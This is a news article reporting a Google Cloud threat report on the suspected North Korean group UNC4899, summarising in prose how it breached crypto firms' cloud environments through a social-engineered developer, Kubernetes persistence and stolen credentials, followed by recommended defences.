A North Korean threat actor known as UNC4899 is suspected of being behind a sophisticated cloud breach campaign that targeted crypto organizations in 2025 and stole millions of dollars in cryptocurrencies.
This activity has been determined with some confidence to be from a state-sponsored adversary and has also been tracked under the code names Jade Sleet, PUKCHONG, Slow Pisces, and TraderTraitor.
“This incident is notable for its combination of social engineering, exploitation of peer-to-peer data (P2P) transfer mechanisms of devices from individuals to businesses, workflow exploitation, and ultimately migration to the cloud to adopt Living Off the Cloud (LOTC) technology,” the tech giant noted in its Cloud Threat Horizons report for the first half of 2026. [PDF] Shared with Hacker News.
Once in the cloud environment, the attackers allegedly exploited legitimate DevOps workflows to obtain credentials, breach container boundaries, and modify Cloud SQL databases to facilitate cryptocurrency theft.
According to Google Cloud, the attack chain begins with a developer’s personal device compromising a corporate workstation and moves to the cloud to make unauthorized changes to financial logic.
It all started when threat actors used social engineering tactics to trick developers into downloading archive files under the guise of collaborating on an open source project. The developer then transferred the same file to the company’s device via AirDrop.
“The victim used an AI-assisted integrated development environment (IDE) to manipulate the contents of the archive and ultimately execute the embedded malicious Python code, generating and executing a binary disguised as a Kubernetes command-line tool,” Google said.
This binary then connected to an attacker-controlled domain and acted as a backdoor into the victim’s corporate machine, giving the attacker the means to migrate into the Google Cloud environment using an authenticated session and available credentials. This step was followed by an initial reconnaissance phase aimed at gathering information about various services and projects.
The attack advances to the next phase with the discovery of the bastion host, where the attacker modifies its multi-factor authentication (MFA) policy attributes to gain access to it and perform additional reconnaissance, such as navigating to specific pods within the Kubernetes environment.
UNC4899 then took a living-off-the-cloud (LotC) approach and configured a persistence mechanism by modifying the Kubernetes deployment configuration so that bash commands are automatically run when a new pod is created. The command itself downloaded a backdoor.
Here are some of the other steps taken by threat actors:
The Kubernetes resource associated with the victim’s CI/CD platform solution was modified to inject a command that displays the service account token in the logs. The attackers were able to obtain the token of a highly privileged CI/CD service account and escalate their privileges, allowing them to perform lateral movement specifically targeting pods that handle network policy and load balancing. Stolen service account tokens were used to authenticate to sensitive infrastructure pods running in privileged mode, escape from containers, and deploy backdoors for persistent access. The threat actors conducted another round of reconnaissance before shifting their attention to workloads responsible for managing customer information such as user identities, account security, and cryptocurrency wallet information. The attacker used this to extract static database credentials that were not securely stored in the pod’s environment variables. The credentials were then misused to access the production database via Cloud SQL Auth Proxy and execute SQL commands to modify user accounts. This includes resetting passwords and updating MFA seeds for several high-value accounts. The attack successfully used the compromised accounts to extract millions of dollars in digital assets.
The incident “highlights the significant risks posed by P2P data transfer methods and other data bridges, privileged container modes, and insecure handling of secrets in cloud environments,” Google said. “Organizations should adopt a layered defense-in-depth strategy that strictly validates identities, restricts data transfer at endpoints, and enforces strict isolation within cloud runtime environments to limit the scope of an intrusion event.”
To combat this threat, organizations are recommended to implement context-aware access and phishing-resistant MFA, ensure that only trusted images are deployed, isolate compromised nodes from establishing connections with external hosts, monitor unexpected container processes, implement robust secret management, and enforce policies that disable or restrict peer-to-peer file sharing using AirDrop or Bluetooth and the mounting of unmanaged external media on corporate devices.
Source link
